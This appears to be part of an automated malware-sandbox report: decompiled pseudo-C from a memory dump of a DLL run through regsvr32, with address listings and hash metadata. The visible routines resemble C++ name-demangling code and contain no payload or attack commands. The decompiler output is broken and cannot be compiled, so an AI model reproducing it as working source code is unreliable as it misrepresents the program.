                                                                      				_t249 =  >  ? r8d :  *_t305 - 0x3d;
                                                                      				goto 0x80034dda;
                                                                      				if (_t249 < 0) goto 0x80035222;
                                                                      				if (_t249 - 3 > 0) goto 0x80035222;
                                                                      				_t258 = _t249 - r8d;
                                                                      				if (_t258 == 0) goto 0x80035222;
                                                                      				r12d = _t249;
                                                                      				 *((long long*)(_t376 - 0x29)) = _t397;
                                                                      				 *(_t376 - 0x21) = r13d;
                                                                      				 *((long long*)(_t376 - 0x39)) =  *_t404;
                                                                      				 *(_t376 - 0x31) =  *(_t404 + 8);
                                                                      				r12d = r12d & 0x00000002;
                                                                      				if (_t258 == 0) goto 0x80034f56;
                                                                      				if ( *_t346 == 0x40) goto 0x80034ee4;
                                                                      				 *(_t376 - 0x11) = 2;
                                                                      				 *((long long*)(_t376 - 0x19)) = "::";
                                                                      				asm("movaps xmm0, [ebp-0x19]");
                                                                      				asm("movdqa [ebp+0x7], xmm0");
                                                                      				E0000000118002E4E4(_t376 - 9, _t376 + 7);
                                                                      				E0000000118002E98C("::", _t376 - 0x19, _t376 - 0x39);
                                                                      				 *((long long*)(_t376 - 0x39)) =  *((intOrPtr*)(_t376 - 0x19));
                                                                      				 *(_t376 - 0x31) =  *(_t376 - 0x11);
                                                                      				_t288 =  *0x800738a8; // 0x0
                                                                      				if ( *_t288 == r13b) goto 0x80034eb4;
                                                                      				E0000000118002FF80( *(_t404 + 8), __rbx, _t376 - 9, _t369, __rsi, _t395);
                                                                      				 *((long long*)(_t376 - 0x19)) = _t397;
                                                                      				 *(_t376 - 0x11) = r13d;
                                                                      				_t298 = _t288;
                                                                      				E0000000118002EE78(0x20, _t288, _t288, _t376 - 0x19);
                                                                      				E0000000118002E98C(_t376 - 0x19, _t376 + 7, _t288);
                                                                      				E0000000118002E98C(_t376 + 7, _t376 + 0x27, _t376 - 0x39);
                                                                      				 *((long long*)(_t376 - 0x39)) =  *_t288;
                                                                      				goto 0x80034ed8;
                                                                      				 *(_t376 - 0x11) = r13d;
                                                                      				_t352 = _t376 - 9;
                                                                      				 *((long long*)(_t376 - 0x19)) = 0x8005fee0;
                                                                      				E0000000118002E98C(_t376 - 0x19, _t352, _t376 - 0x39);
                                                                      				 *((long long*)(_t376 - 0x39)) =  *((intOrPtr*)(_t376 - 9));
                                                                      				 *(_t376 - 0x31) =  *(_t376 - 1);
                                                                      				goto 0x80034eef;
                                                                      				_t45 = _t352 + 1; // 0x2
                                                                      				_t291 = _t45;
                                                                      				 *0x800738a8 = _t291;
                                                                      				if ( *_t291 == r13b) goto 0x80034ff0;
                                                                      				if ( *_t291 != 0x40) goto 0x80035222;
                                                                      				 *((long long*)(_t376 - 9)) = _t397;
                                                                      				 *0x800738a8 = _t291 + 1;
                                                                      				r8d = 0;
                                                                      				_t169 =  *0x800738b8; // 0x0
                                                                      				 *(_t376 - 1) = r13d;
                                                                      				 *((intOrPtr*)(_t378 - 0xa0 + 0x20)) = 1;
                                                                      				if ((_t169 & 0x00000060) == 0x60) goto 0x80034fc4;
                                                                      				 *((long long*)(_t376 - 0x19)) = _t397;
                                                                      				 *(_t376 - 0x11) = r13d;
                                                                      				E000000011800334C4(_t288, _t376 + 7, _t376 - 0x19, _t369, _t371, _t376 - 9);
                                                                      				_t293 =  *((intOrPtr*)(_t376 + 7));
                                                                      				 *((long long*)(_t376 - 0x29)) = _t293;
                                                                      				 *(_t376 - 0x21) =  *(_t376 + 0xf);
                                                                      				r14d = 0xffffff00;
                                                                      				if ((sil & 0x00000004) == 0) goto 0x80035022;
                                                                      				_t173 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t173 >> 1) & 0x00000001) == 0) goto 0x80035005;
                                                                      				E00000001180032D48( *(_t376 - 1), _t228, _t293, _t298, _t376 + 0x27, _t369, _t371, _t376 - 0x39, _t395, 0x8005fee0, _t403);
                                                                      				 *((long long*)(_t376 - 0x19)) = _t397;
                                                                      				 *(_t376 - 0x11) = r13d;
                                                                      				_t299 = _t293;
                                                                      				E0000000118002EE78(0x20, _t293, _t293, _t376 - 0x19);
                                                                      				E0000000118002E98C(_t376 - 0x19, _t376 + 7, _t293);
                                                                      				E0000000118002E98C(_t376 + 7, _t376 - 9, _t376 - 0x39);
                                                                      				_t223 =  *(_t293 + 8);
                                                                      				 *((long long*)(_t376 - 0x39)) =  *_t293;
                                                                      				goto 0x8003501f;
                                                                      				 *((long long*)(_t376 + 7)) = _t397;
                                                                      				 *(_t376 + 0xf) = r13d;
                                                                      				E000000011800334C4(_t293, _t376 - 0x19, _t376 - 9, _t369, _t371, _t376 + 7);
                                                                      				if ( *(_t376 - 0x11) - 1 <= 0) goto 0x80034f56;
                                                                      				goto 0x80034f53;
                                                                      				 *(_t376 + 0xf) = r13d;
                                                                      				 *((long long*)(_t376 + 7)) = 0x8005fee0;
                                                                      				goto 0x80034d6a;
                                                                      				E00000001180032D48(_t223, _t228, _t293, _t299, _t376 + 7, _t369, _t371, _t376 - 0x39, _t395, 0x8005fee0, _t399);
                                                                      				if ( *(_t376 - 0x31) == 3) goto 0x80035022;
                                                                      				if ( *(_t293 + 8) - 1 <= 0) goto 0x80035022;
                                                                      				_t225 = _t223 & r14d |  *(_t293 + 8) & 0x000000ff;
                                                                      				 *(_t376 - 0x31) = _t225;
                                                                      				_t184 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t184 >> 1) & 0x00000001) == 0) goto 0x80035058;
                                                                      				E00000001180032F88(_t299, _t376 + 0x27, _t369, _t397, _t395);
                                                                      				E0000000118002E98C(_t293, _t376 + 7, _t376 - 0x39);
                                                                      				 *((long long*)(_t376 - 0x39)) =  *_t293;
                                                                      				 *(_t376 - 0x31) =  *(_t293 + 8);
                                                                      				goto 0x80035075;
                                                                      				E00000001180032F88(_t299,  *_t293, _t369);
                                                                      				if ( *(_t376 - 0x31) == 3) goto 0x80035075;
                                                                      				if ( *(_t293 + 8) - 1 <= 0) goto 0x80035075;
                                                                      				 *(_t376 - 0x31) = _t225 & r14d |  *(_t293 + 8) & 0x000000ff;
                                                                      				if ( *_t404 == _t397) goto 0x800350bb;
                                                                      				 *((long long*)(_t376 - 0x19)) = _t397;
                                                                      				 *(_t376 - 0x11) = r13d;
                                                                      				E0000000118002EE78(0x28, _t293, _t299, _t376 - 0x19);
                                                                      				E0000000118002E98C(_t376 - 0x19, _t376 + 7, _t376 - 0x39);
                                                                      				r8b = 0x29;
                                                                      				E0000000118002E9B8(_t376 + 7, _t376 + 0x27);
                                                                      				 *((long long*)(_t376 - 0x39)) =  *_t293;
                                                                      				 *(_t376 - 0x31) =  *(_t293 + 8);
                                                                      				E0000000118002E384(_t293, _t299, 0x800738d0, _t376 + 0x27, _t371, _t375);
                                                                      				if (_t293 == 0) goto 0x800350dd;
                                                                      				 *_t293 = _t397;
                                                                      				 *(_t293 + 8) = r13d;
                                                                      				goto 0x800350e0;
                                                                      				_t373 = _t397;
                                                                      				E000000011800330C8(_t376 + 0x17);
                                                                      				E00000001180035254(_t299, _t376 + 0x27, _t373);
                                                                      				 *((long long*)(_t376 - 0x19)) = _t397;
                                                                      				 *(_t376 - 0x11) = r13d;
                                                                      				_t300 = _t293;
                                                                      				E0000000118002EE78(0x28, _t293, _t300, _t376 - 0x19);
                                                                      				_t391 = _t300;
                                                                      				E0000000118002E98C(_t376 - 0x19, _t376 + 7, _t300);
                                                                      				r8b = 0x29;
                                                                      				E0000000118002E9B8(_t376 + 7, _t376 - 9);
                                                                      				E0000000118002EC28(_t228, _t376 - 0x39, _t293, _t300);
                                                                      				_t229 =  *0x800738b8; // 0x0
                                                                      				if ((_t229 & 0x00000060) == 0x60) goto 0x8003515e;
                                                                      				if (r12d == 0) goto 0x8003515e;
                                                                      				E0000000118002EC28(_t229, _t376 - 0x39, _t376 - 0x29, _t300);
                                                                      				_t230 =  *0x800738b8; // 0x0
                                                                      				_t232 =  !(_t230 >> 0x13);
                                                                      				if (( !(_t230 >> 0x13) & 0x00000001) == 0) goto 0x8003517f;
                                                                      				E000000011800355CC(_t225 & r14d |  *(_t293 + 8) & 0x000000ff,  !(_t230 >> 0x13), _t300, _t376 + 0x27, _t369, _t373);
                                                                      				E0000000118002EC28( !(_t230 >> 0x13), _t376 - 0x39, _t293, _t300);
                                                                      				goto 0x8003519f;
                                                                      				E000000011800355CC(_t225 & r14d |  *(_t293 + 8) & 0x000000ff, _t232, _t300, _t376 - 0x39, _t369, _t373);
                                                                      				if ( *(_t376 - 0x31) == 3) goto 0x8003519f;
                                                                      				if ( *(_t293 + 8) - 1 <= 0) goto 0x8003519f;
                                                                      				 *(_t376 - 0x31) =  *(_t376 - 0x31) & r14d |  *(_t293 + 8) & 0x000000ff;
                                                                      				E00000001180035568(_t376 + 0x27);
                                                                      				E0000000118002EC28( *(_t376 - 0x31) & r14d |  *(_t293 + 8) & 0x000000ff, _t376 - 0x39, _t293, _t391);
                                                                      				_t212 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t212 >> 8) & 0x00000001) == 0) goto 0x800351f9;
                                                                      				E00000001180035544(_t376 + 0x27);
                                                                      				E0000000118002EC28( *(_t376 - 0x31) & r14d |  *(_t293 + 8) & 0x000000ff, _t376 - 0x39, _t293, _t391);
                                                                      				if (_t373 == 0) goto 0x80035218;
                                                                      				 *_t373 =  *((intOrPtr*)(_t376 - 0x39));
                                                                      				 *(_t373 + 8) =  *(_t376 - 0x31);
                                                                      				_t295 =  *((intOrPtr*)(_t376 + 0x17));
                                                                      				 *_t369 = _t295;
                                                                      				 *(_t369 + 8) =  *(_t376 + 0x1f);
                                                                      				goto 0x8003522d;
                                                                      				E00000001180035544(_t376 - 0x39);
                                                                      				if ( *(_t376 - 0x31) == 3) goto 0x800351d8;
                                                                      				if ( *(_t295 + 8) - 1 <= 0) goto 0x800351d8;
                                                                      				goto 0x800351db;
                                                                      				 *(_t369 + 8) = r13d;
                                                                      				 *(_t369 + 8) = 3;
                                                                      				goto 0x8003522a;
                                                                      				 *(_t369 + 8) = r13d;
                                                                      				 *(_t369 + 8) = 2;
                                                                      				 *_t369 = _t397;
                                                                      				return  *(_t295 + 8) & 0x000000ff;
                                                                      			}





































                                                                      0x180034d1c
                                                                      0x180034d1c
                                                                      0x180034d1c
                                                                      0x180034d1f
                                                                      0x180034d23
                                                                      0x180034d27
                                                                      0x180034d34
                                                                      0x180034d3f
                                                                      0x180034d42
                                                                      0x180034d45
                                                                      0x180034d4c
                                                                      0x180034d52
                                                                      0x180034d5b
                                                                      0x180034d5f
                                                                      0x180034d63
                                                                      0x180034d6d
                                                                      0x180034d72
                                                                      0x180034d7d
                                                                      0x180034d82
                                                                      0x180034d8b
                                                                      0x180034d92
                                                                      0x180034d95
                                                                      0x180034d9f
                                                                      0x180034da4
                                                                      0x180034da9
                                                                      0x180034da9
                                                                      0x180034db0
                                                                      0x180034dc0
                                                                      0x180034dc4
                                                                      0x180034dc8
                                                                      0x180034dd4
                                                                      0x180034dda
                                                                      0x180034ddd
                                                                      0x180034de6
                                                                      0x180034ded
                                                                      0x180034df1
                                                                      0x180034df5
                                                                      0x180034df9
                                                                      0x180034dfc
                                                                      0x180034e00
                                                                      0x180034e10
                                                                      0x180034e1d
                                                                      0x180034e24
                                                                      0x180034e2c
                                                                      0x180034e34
                                                                      0x180034e39
                                                                      0x180034e49
                                                                      0x180034e52
                                                                      0x180034e59
                                                                      0x180034e5c
                                                                      0x180034e66
                                                                      0x180034e6c
                                                                      0x180034e73
                                                                      0x180034e7b
                                                                      0x180034e7f
                                                                      0x180034e82
                                                                      0x180034e92
                                                                      0x180034ea3
                                                                      0x180034eae
                                                                      0x180034eb2
                                                                      0x180034eb8
                                                                      0x180034ebc
                                                                      0x180034ec0
                                                                      0x180034ec8
                                                                      0x180034ed4
                                                                      0x180034edf
                                                                      0x180034ee2
                                                                      0x180034ee4
                                                                      0x180034ee4
                                                                      0x180034ee8
                                                                      0x180034ef2
                                                                      0x180034efb
                                                                      0x180034f04
                                                                      0x180034f08
                                                                      0x180034f0f
                                                                      0x180034f12
                                                                      0x180034f1b
                                                                      0x180034f1f
                                                                      0x180034f29
                                                                      0x180034f33
                                                                      0x180034f3b
                                                                      0x180034f43
                                                                      0x180034f48
                                                                      0x180034f4c
                                                                      0x180034f53
                                                                      0x180034f56
                                                                      0x180034f60
                                                                      0x180034f66
                                                                      0x180034f76
                                                                      0x180034f7c
                                                                      0x180034f83
                                                                      0x180034f8b
                                                                      0x180034f8f
                                                                      0x180034f92
                                                                      0x180034fa2
                                                                      0x180034fb3
                                                                      0x180034fbb
                                                                      0x180034fbe
                                                                      0x180034fc2
                                                                      0x180034fc8
                                                                      0x180034fd0
                                                                      0x180034fd8
                                                                      0x180034fe1
                                                                      0x180034feb
                                                                      0x180034ff0
                                                                      0x180034ff8
                                                                      0x180035000
                                                                      0x180035005
                                                                      0x18003500e
                                                                      0x180035014
                                                                      0x18003501d
                                                                      0x18003501f
                                                                      0x180035022
                                                                      0x180035032
                                                                      0x180035034
                                                                      0x180035044
                                                                      0x18003504f
                                                                      0x180035053
                                                                      0x180035056
                                                                      0x180035058
                                                                      0x180035061
                                                                      0x180035067
                                                                      0x180035072
                                                                      0x180035078
                                                                      0x18003507c
                                                                      0x180035084
                                                                      0x180035088
                                                                      0x180035099
                                                                      0x18003509e
                                                                      0x1800350a9
                                                                      0x1800350b4
                                                                      0x1800350b8
                                                                      0x1800350c7
                                                                      0x1800350d2
                                                                      0x1800350d4
                                                                      0x1800350d7
                                                                      0x1800350db
                                                                      0x1800350dd
                                                                      0x1800350e7
                                                                      0x1800350f0
                                                                      0x1800350f7
                                                                      0x1800350ff
                                                                      0x180035103
                                                                      0x180035106
                                                                      0x18003510b
                                                                      0x180035116
                                                                      0x18003511b
                                                                      0x180035126
                                                                      0x180035132
                                                                      0x180035137
                                                                      0x180035144
                                                                      0x180035149
                                                                      0x180035153
                                                                      0x180035158
                                                                      0x180035161
                                                                      0x18003516a
                                                                      0x18003516c
                                                                      0x180035178
                                                                      0x18003517d
                                                                      0x18003517f
                                                                      0x180035188
                                                                      0x18003518e
                                                                      0x18003519c
                                                                      0x1800351a3
                                                                      0x1800351af
                                                                      0x1800351b4
                                                                      0x1800351c5
                                                                      0x1800351c7
                                                                      0x1800351d3
                                                                      0x1800351de
                                                                      0x1800351e4
                                                                      0x1800351e7
                                                                      0x1800351ea
                                                                      0x1800351ee
                                                                      0x1800351f4
                                                                      0x1800351f7
                                                                      0x1800351f9
                                                                      0x180035202
                                                                      0x180035208
                                                                      0x180035216
                                                                      0x180035218
                                                                      0x18003521c
                                                                      0x180035220
                                                                      0x180035222
                                                                      0x180035226
                                                                      0x18003522a
                                                                      0x180035250

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 2943138195-0
                                                                      • Opcode ID: 7f29f99a1f6998bcc3eb7ab938d6bd4f59819db813d253d6efb9adef0cb58311
                                                                      • Instruction ID: 7e3f2b1fb56622614b49c25d958eeb98775696f4c95dcc327cd7a4279204f318
                                                                      • Opcode Fuzzy Hash: 7f29f99a1f6998bcc3eb7ab938d6bd4f59819db813d253d6efb9adef0cb58311
                                                                      • Instruction Fuzzy Hash: AEF15A76B00A88AEF793DF64E4903ED77B0E30978CF458416EA4967AA9DE34C65DC340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E00000001180031474(void* __ebx, void* __edx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r10, void* __r12, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v24;
                                                                      				signed int _v40;
                                                                      				void* _v41;
                                                                      				char _v48;
                                                                      				char _v56;
                                                                      				char _v72;
                                                                      				intOrPtr _v80;
                                                                      				char _v88;
                                                                      				char _v96;
                                                                      				char _v104;
                                                                      				signed int _t117;
                                                                      				char _t130;
                                                                      				void* _t135;
                                                                      				void* _t143;
                                                                      				void* _t162;
                                                                      				void* _t166;
                                                                      				void* _t170;
                                                                      				void* _t171;
                                                                      				char _t172;
                                                                      				void* _t174;
                                                                      				void* _t176;
                                                                      				void* _t178;
                                                                      				long long* _t182;
                                                                      				long long* _t189;
                                                                      				intOrPtr _t194;
                                                                      				signed long long _t197;
                                                                      				char* _t199;
                                                                      				long long _t201;
                                                                      				long long* _t204;
                                                                      				long long* _t205;
                                                                      				long long* _t206;
                                                                      				intOrPtr _t210;
                                                                      				long long _t215;
                                                                      				intOrPtr* _t254;
                                                                      				char* _t264;
                                                                      				long long* _t266;
                                                                      				long long* _t284;
                                                                      				void* _t289;
                                                                      				long long _t301;
                                                                      
                                                                      				_t300 = __r12;
                                                                      				_t286 = __rsi;
                                                                      				_t215 = __rbx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t197 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v40 = _t197 ^ _t289 - 0x00000070;
                                                                      				_t199 =  *0x800738a8; // 0x0
                                                                      				_t284 = __rcx;
                                                                      				r14d = 0;
                                                                      				_t130 =  *_t199;
                                                                      				_t5 = _t199 + 1; // 0x1
                                                                      				_t264 = _t5;
                                                                      				 *0x800738a8 = _t264;
                                                                      				_t170 = _t130 - 0x46;
                                                                      				if (_t170 > 0) goto 0x80031631;
                                                                      				if (_t170 == 0) goto 0x80031695;
                                                                      				_t171 = _t130 - 0x36;
                                                                      				if (_t171 > 0) goto 0x800315cc;
                                                                      				if (_t171 == 0) goto 0x800315bf;
                                                                      				_t172 = _t130;
                                                                      				if (_t172 == 0) goto 0x800315a1;
                                                                      				if (_t172 == 0) goto 0x80031594;
                                                                      				if (_t172 == 0) goto 0x80031528;
                                                                      				if (_t172 == 0) goto 0x8003151b;
                                                                      				_t162 = _t130 - 0x2c;
                                                                      				if (_t172 == 0) goto 0x8003150e;
                                                                      				if (_t162 != 1) goto 0x80031911;
                                                                      				E00000001180030B68(_t130, __rcx, __r8);
                                                                      				goto 0x8003197e;
                                                                      				E00000001180030B00(_t284);
                                                                      				goto 0x8003197e;
                                                                      				E000000011800308E0(_t130, __rbx, _t284, _t264, __r8);
                                                                      				goto 0x8003197e;
                                                                      				_t174 =  *_t264 - 0x40;
                                                                      				if (_t174 != 0) goto 0x80031564;
                                                                      				_t6 = _t264 + 1; // 0x2
                                                                      				_v80 = 4;
                                                                      				 *0x800738a8 = _t6;
                                                                      				_t201 = "NULL";
                                                                      				_v88 = _t201;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E0000000118002E4E4(_t284,  &_v104);
                                                                      				goto 0x8003197e;
                                                                      				_v56 = _t301;
                                                                      				_v48 = r14d;
                                                                      				E0000000118002EE78(0x26, _t201, _t215,  &_v56);
                                                                      				E0000000118002EF74(_t174, _t215,  &_v104, __rsi, __r12);
                                                                      				_t293 = _t201;
                                                                      				_t266 = _t284;
                                                                      				E0000000118002E98C( &_v56, _t266, _t201);
                                                                      				goto 0x8003197e;
                                                                      				E000000011800305E4(_t215, _t284);
                                                                      				goto 0x8003197e;
                                                                      				_t15 = _t266 - 1; // 0x0
                                                                      				 *0x800738a8 = _t15;
                                                                      				 *_t284 = 0x8005fee0;
                                                                      				 *((intOrPtr*)(_t284 + 8)) = r14d;
                                                                      				goto 0x8003197e;
                                                                      				E00000001180030BF8(__ebx, _t130, _t284, _t266, _t284, _t286, _t201);
                                                                      				goto 0x8003197e;
                                                                      				if (_t174 == 0) goto 0x80031624;
                                                                      				if (_t174 == 0) goto 0x80031617;
                                                                      				if (_t174 == 0) goto 0x80031608;
                                                                      				if (_t174 == 0) goto 0x80031608;
                                                                      				_t135 = _t130 - 0x2b;
                                                                      				if (_t174 == 0) goto 0x800315fb;
                                                                      				if (_t135 != 2) goto 0x80031911;
                                                                      				E0000000118002EF74(_t135 - 2, _t215, _t284, _t286, _t300);
                                                                      				goto 0x8003197e;
                                                                      				E00000001180030C8C(_t135, _t284, _t266, _t201);
                                                                      				goto 0x8003197e;
                                                                      				E000000011800307B8(_t162, _t215, _t284, _t286, __r9, __r10);
                                                                      				goto 0x8003197e;
                                                                      				E00000001180030E00(__ebx, _t135, _t215, _t284, _t266, _t284, _t286, _t201, _t300);
                                                                      				goto 0x8003197e;
                                                                      				E00000001180030D28(__ebx, _t135, _t162, _t284, _t284, _t286, _t201);
                                                                      				goto 0x8003197e;
                                                                      				_t176 = _t162 - 0x51;
                                                                      				if (_t176 > 0) goto 0x8003182d;
                                                                      				if (_t176 == 0) goto 0x80031911;
                                                                      				if (_t176 == 0) goto 0x80031695;
                                                                      				if (_t176 == 0) goto 0x80031695;
                                                                      				if (_t176 == 0) goto 0x80031695;
                                                                      				if (_t176 == 0) goto 0x80031695;
                                                                      				if (_t176 == 0) goto 0x80031675;
                                                                      				if (_t135 - 0x41 != 1) goto 0x80031911;
                                                                      				_t204 = "nullptr";
                                                                      				_v80 = 7;
                                                                      				goto 0x80031546;
                                                                      				E000000011800319A8(_t162, _t215,  &_v104, _t284, _t293);
                                                                      				_t178 = _v96 - 1;
                                                                      				if (_t178 > 0) goto 0x80031911;
                                                                      				E00000001180031474(__ebx, _t162, _t215, _t284, _t284, _t286, _t293, __r9, __r10, _t300);
                                                                      				goto 0x8003197e;
                                                                      				_v56 = _t301;
                                                                      				_v48 = r14d;
                                                                      				E0000000118002EE78(0x7b, _t204, _t215,  &_v56);
                                                                      				if (_t178 == 0) goto 0x800316c5;
                                                                      				_t143 = _t162 - 0x47;
                                                                      				if (_t178 == 0) goto 0x800316c5;
                                                                      				if (_t143 != 1) goto 0x80031727;
                                                                      				E0000000118002EF74(_t143 - 1, _t215,  &_v104, _t286, _t300);
                                                                      				E0000000118002EC28(_t143,  &_v56, _t204, _t293);
                                                                      				if (_v48 - 1 > 0) goto 0x80031727;
                                                                      				if (_v56 != _t301) goto 0x800316fb;
                                                                      				_v56 = _t301;
                                                                      				_v48 = r14d;
                                                                      				E0000000118002EE78(0x2c, _t204, _t215,  &_v56);
                                                                      				goto 0x80031727;
                                                                      				E0000000118002E384(_t204, _t215, 0x800738d0, _t215, _t286);
                                                                      				_t182 = _t204;
                                                                      				if (_t182 == 0) goto 0x80031718;
                                                                      				 *_t204 = 0x8005fd10;
                                                                      				 *((char*)(_t204 + 8)) = 0x2c;
                                                                      				goto 0x8003171b;
                                                                      				_t205 = _t301;
                                                                      				E000000011800367C8(_t205, _t215,  &_v56, _t205);
                                                                      				if (_t182 == 0) goto 0x800317aa;
                                                                      				if (_t182 == 0) goto 0x80031748;
                                                                      				if (_t182 == 0) goto 0x8003180c;
                                                                      				_t166 = _t162 - 0x43;
                                                                      				if (_t182 == 0) goto 0x800317aa;
                                                                      				if (_t166 != 1) goto 0x80031821;
                                                                      				E000000011800305E4(_t215,  &_v104);
                                                                      				E0000000118002EC28(_t143,  &_v56, _t205, _t293);
                                                                      				if (_v48 - 1 > 0) goto 0x800317aa;
                                                                      				if (_v56 != _t301) goto 0x8003177e;
                                                                      				_v56 = _t301;
                                                                      				_v48 = r14d;
                                                                      				E0000000118002EE78(0x2c, _t205, _t215,  &_v56);
                                                                      				goto 0x800317aa;
                                                                      				E0000000118002E384(_t205, _t215, 0x800738d0, _t215, _t286);
                                                                      				if (_t205 == 0) goto 0x8003179b;
                                                                      				 *_t205 = 0x8005fd10;
                                                                      				 *((char*)(_t205 + 8)) = 0x2c;
                                                                      				goto 0x8003179e;
                                                                      				_t206 = _t301;
                                                                      				E000000011800367C8(_t206, _t215,  &_v56, _t206);
                                                                      				E000000011800305E4(_t215,  &_v104);
                                                                      				E0000000118002EC28(_t143,  &_v56, _t206, _t293);
                                                                      				if (_v48 - 1 > 0) goto 0x8003180c;
                                                                      				if (_v56 != _t301) goto 0x800317e0;
                                                                      				_v56 = _t301;
                                                                      				_v48 = r14d;
                                                                      				E0000000118002EE78(0x2c, _t206, _t215,  &_v56);
                                                                      				goto 0x8003180c;
                                                                      				E0000000118002E384(_t206, _t215, 0x800738d0, _t215, _t286);
                                                                      				_t189 = _t206;
                                                                      				if (_t189 == 0) goto 0x800317fd;
                                                                      				 *_t206 = 0x8005fd10;
                                                                      				 *((char*)(_t206 + 8)) = 0x2c;
                                                                      				goto 0x80031800;
                                                                      				E000000011800367C8(_t301, _t215,  &_v56, _t301);
                                                                      				E000000011800305E4(_t215,  &_v104);
                                                                      				E0000000118002EC28(_t143,  &_v56, _t301, _t293);
                                                                      				r8b = 0x7d;
                                                                      				goto 0x80031976;
                                                                      				if (_t189 == 0) goto 0x8003184a;
                                                                      				if (_t189 == 0) goto 0x80031876;
                                                                      				if (_t189 == 0) goto 0x8003184a;
                                                                      				if (_t189 == 0) goto 0x8003184a;
                                                                      				if (_t143 - 0x4f != 1) goto 0x80031911;
                                                                      				E000000011800305E4(_t215,  &_v104);
                                                                      				_t254 = _v104;
                                                                      				if (_t254 == 0) goto 0x80031882;
                                                                      				 *0x8007a008();
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t254 + 0x18)))) = r14b;
                                                                      				goto 0x80031886;
                                                                      				 *_t284 = _t301;
                                                                      				 *((intOrPtr*)(_t284 + 8)) = r14d;
                                                                      				goto 0x8003197e;
                                                                      				_v56 = r14b;
                                                                      				_t117 = E0000000118002B014( *((intOrPtr*)( *_t254 + 0x18)), _t215,  &_v56, _t284);
                                                                      				r15d = 0xfff;
                                                                      				if (( *0x800738b8 & 0x00004000) == 0) goto 0x800318d2;
                                                                      				_t210 =  *0x800738c0; // 0x0
                                                                      				if (_t210 == 0) goto 0x800318d2;
                                                                      				 *0x8007a008();
                                                                      				_t194 = _t210;
                                                                      				if (_t194 == 0) goto 0x800318d2;
                                                                      				r8b = r14b;
                                                                      				E00000001180036344(_t284, _t210);
                                                                      				goto 0x8003197e;
                                                                      				r9d = _t117 & r15d;
                                                                      				E0000000118002E29C(_t117 & r15d, 0x10, _t210,  &_v56, _t210, "%d", __r9);
                                                                      				r8b = r14b;
                                                                      				E00000001180036344( &_v88,  &_v56);
                                                                      				if (_t194 == 0) goto 0x80031937;
                                                                      				if (_t194 == 0) goto 0x80031937;
                                                                      				if (_t194 == 0) goto 0x8003192e;
                                                                      				if (_t166 - 0x4f == 1) goto 0x8003191e;
                                                                      				 *((intOrPtr*)(_t284 + 8)) = r14d;
                                                                      				 *((char*)(_t284 + 8)) = 2;
                                                                      				 *_t284 = _t301;
                                                                      				goto 0x8003197e;
                                                                      				_v96 = 0x1a;
                                                                      				goto 0x80031945;
                                                                      				goto 0x8003193e;
                                                                      				_v96 = 0x19;
                                                                      				_v104 = "`template-type-parameter-";
                                                                      				asm("movaps xmm0, [ebp-0x50]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E0000000118002E4E4( &_v72,  &_v104);
                                                                      				E0000000118002E98C("`template-type-parameter-",  &_v104,  &_v88);
                                                                      				r8b = 0x27;
                                                                      				return E00000001180002FB0(E0000000118002E9B8( &_v104, _t284), _t117 & r15d, _v40 ^ _t289 - 0x00000070);
                                                                      			}










































                                                                      0x180031474
                                                                      0x180031474
                                                                      0x180031474
                                                                      0x180031474
                                                                      0x180031479
                                                                      0x18003147e
                                                                      0x18003148f
                                                                      0x180031499
                                                                      0x18003149d
                                                                      0x1800314a4
                                                                      0x1800314a7
                                                                      0x1800314aa
                                                                      0x1800314ad
                                                                      0x1800314ad
                                                                      0x1800314b1
                                                                      0x1800314ba
                                                                      0x1800314bd
                                                                      0x1800314c3
                                                                      0x1800314c9
                                                                      0x1800314cc
                                                                      0x1800314d2
                                                                      0x1800314d8
                                                                      0x1800314da
                                                                      0x1800314e3
                                                                      0x1800314ec
                                                                      0x1800314f1
                                                                      0x1800314f3
                                                                      0x1800314f6
                                                                      0x1800314fb
                                                                      0x180031504
                                                                      0x180031509
                                                                      0x180031511
                                                                      0x180031516
                                                                      0x18003151e
                                                                      0x180031523
                                                                      0x180031528
                                                                      0x18003152b
                                                                      0x18003152d
                                                                      0x180031531
                                                                      0x180031538
                                                                      0x18003153f
                                                                      0x180031546
                                                                      0x18003154e
                                                                      0x180031555
                                                                      0x18003155a
                                                                      0x18003155f
                                                                      0x180031566
                                                                      0x18003156e
                                                                      0x180031572
                                                                      0x18003157b
                                                                      0x180031580
                                                                      0x180031587
                                                                      0x18003158a
                                                                      0x18003158f
                                                                      0x180031597
                                                                      0x18003159c
                                                                      0x1800315a1
                                                                      0x1800315a5
                                                                      0x1800315b3
                                                                      0x1800315b6
                                                                      0x1800315ba
                                                                      0x1800315c2
                                                                      0x1800315c7
                                                                      0x1800315cf
                                                                      0x1800315d4
                                                                      0x1800315d9
                                                                      0x1800315de
                                                                      0x1800315e0
                                                                      0x1800315e3
                                                                      0x1800315e8
